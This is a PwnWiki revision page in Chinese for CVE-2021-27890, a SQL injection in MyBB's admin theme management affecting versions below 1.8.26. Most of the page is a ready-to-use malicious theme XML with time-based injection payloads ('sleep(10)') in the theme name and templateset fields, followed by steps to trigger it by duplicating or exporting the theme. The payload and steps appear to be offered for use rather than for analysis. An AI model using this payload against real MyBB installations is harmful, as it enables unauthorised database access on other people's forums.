Difference between revisions of "CVE-2021-27890 MyBB後台論壇主題管理SQL注入漏洞/zh-cn"
From PwnWiki
(Created page with "CVE-2021-27890 MyBB后台论坛主题管理SQL注入漏洞") |
(Created page with "在后台主题管理处导入构造的恶意xml") |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
| − | + | ==影响版本== | |
| − | = | ||
| − | |||
<pre> | <pre> | ||
| Line 9: | Line 7: | ||
| − | |||
==漏洞利用== | ==漏洞利用== | ||
| − | |||
| − | + | 在后台主题管理处导入构造的恶意xml | |
| − | |||
| − | |||
<pre> | <pre> | ||
Revision as of 14:04, 31 May 2021
影响版本
< 1.8.26
漏洞利用
在后台主题管理处导入构造的恶意xml
<?xml version="1.0" encoding="UTF-8"?>
<theme name="1' and sleep(10) and '" version="1825">
<properties>
<templateset>-2' or sleep(0.01) or '</templateset>
<editortheme><![CDATA[mybb.css]]></editortheme>
<imgdir><![CDATA[images]]></imgdir>
<logo><![CDATA[images/logo.png]]></logo>
<tablespace><![CDATA[5]]></tablespace>
<borderwidth><![CDATA[0]]></borderwidth>
<color><![CDATA[]]></color>
<disporder><![CDATA[a:7:{s:10:"global.css";i:1;s:10:"usercp.css";i:2;s:9:"modcp.css";i:3;s:16:"star_ratings.css";i:4;s:14:"showthread.css";i:5;s:17:"thread_status.css";i:6;s:8:"css3.css";i:7;}]]></disporder>
</properties>
<stylesheets>
</stylesheets>
<templates>
</templates>
</theme>
點擊Duplicate Theme,抓包,成功延时注入(導出主題也會存在該注入)
